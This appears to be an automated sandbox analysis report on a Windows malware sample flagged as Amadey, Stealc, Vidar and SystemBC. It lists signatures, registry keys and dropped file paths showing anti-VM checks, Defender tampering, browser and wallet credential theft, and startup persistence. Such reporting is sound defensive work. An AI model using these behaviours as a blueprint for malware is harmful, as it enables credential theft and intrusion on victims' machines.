Malware Analysis Report

2025-04-03 09:22

Sample ID 250306-f2tqwszqv3
Target 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
SHA256 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a
Tags
amadey stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery execution persistence spyware stealer trojan gcleaner healer trump dropper evasion loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a

Threat Level: Known bad

The file 4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a was found to be: Known bad.

Malicious Activity Summary

amadey stealc systembc vidar 092155 ir7am traff1 credential_access defense_evasion discovery execution persistence spyware stealer trojan gcleaner healer trump dropper evasion loader

Healer

Gcleaner family

Modifies Windows Defender notification settings

Systembc family

Vidar

Modifies Windows Defender TamperProtection settings

GCleaner

Amadey family

Detect Vidar Stealer

SystemBC

Healer family

Stealc family

Amadey

Detects Healer an antivirus disabler dropper

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender Real-time Protection settings

Stealc

Vidar family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Checks BIOS information in registry

.NET Reactor proctector

Loads dropped DLL

Unsecured Credentials: Credentials In Files

Identifies Wine through registry keys

Reads user/profile data of local email clients

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Windows security modification

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

Modifies registry class

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 05:22

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 05:22

Reported

2025-03-06 05:25

Platform

win7-20250207-en

Max time kernel

89s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Uses browser remote debugging

credential_access stealer
Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\dmax\rqrt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\dmax\rqrt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe N/A
N/A N/A C:\ProgramData\dmax\rqrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\65198a42c7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10110390101\\65198a42c7.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\dmax\rqrt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110390101\65198a42c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
